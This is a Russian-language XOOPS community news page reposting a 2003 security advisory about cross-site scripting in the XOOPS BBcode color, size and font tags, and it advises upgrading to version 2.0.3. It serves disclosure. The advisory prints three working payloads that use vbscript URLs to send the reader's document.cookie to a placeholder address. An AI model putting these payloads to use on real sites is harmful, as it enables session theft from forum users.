Вход

Ник

Пароль

Потеряли Пароль?

Вы ещё не зарегистрированы?
Зарегистрируйтесь Сейчас!

Главное Меню
 Домой
 Новости
   Ваша Новость
   Архив
 Файлы
   Послать файл
   Популярные
   Лучшие по рейтингу
 Web Links
   Submit
   Popular
   Top Rated
 Форум
 Пользователи
 ЧаВо (FAQ)
Последние Версии
XOOPS v.1.3.10
(stable) ( скачать)

Русификация XOOPS 1.3.X

XOOPS 2.0.2
(скачать [10.04.2011])

XOOPS 2.5.9
(stable release) (скачать [05.08.2017])

XOOPS Module Repository
(скачать [21.02.2012])

XOOPS 2.x.x Language Pack
Кто в Online
Сейчас на сайте
Гостей - 6,
Пользователей - 0.


Вы - Анонимный Пользователь.
Зарегистрируйтесь сейчас!

Счётчик
Яндекс цитирования


 Безопасность : Межсайтовый скриптинг в BBcode тэгах в XOOPS
         Sych - 14.08.2003 г. 9:51:35 (прочтений: 3101)
Безопасность
Уязвимость обнаружена в систему управления содержанием XOOPS. Удаленный пользователь может выполнить XSS нападение.

Удаленный атакующий может внедрить произвольный код сценария в некоторые BBcode тэги, который будет выполнен в браузере пользователя, просматривающего злонамеренное сообщение. Уязвимость может использоваться в модулях - Private Messages, News и NewBB (forum). Эксплоит:

{color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+
Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/color]

{size=10;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+Chr(100)+
Chr(101)+Chr(102)+document.cookie))]a[/size]

{font=Verdana;background:url(vbscript:location.replace(Chr(97)+Chr(98)+Chr(99)+
Chr(100)+Chr(101)+Chr(102)+document.cookie))]a[/font]

Уязвимость обнаружена в XOOPS 1.3.x-2.0.x
Для устранения уязвимости, установите обновленную версию программы (2.0.3)

http://www.securitylab.ru
 
 Родственные Ссылки
· Ещё Безопасность
· Новости от Sych


Наиболее читаемая Статья про Безопасность
Security Patch для Xoops v.1.3.10

Последние новости о Безопасность
Security Patch для Xoops v.1.3.10
Версия для печати  Послать эту Статью Другу


Powered by XOOPS 1.3.10 © 2002-2012 The XOOPS Project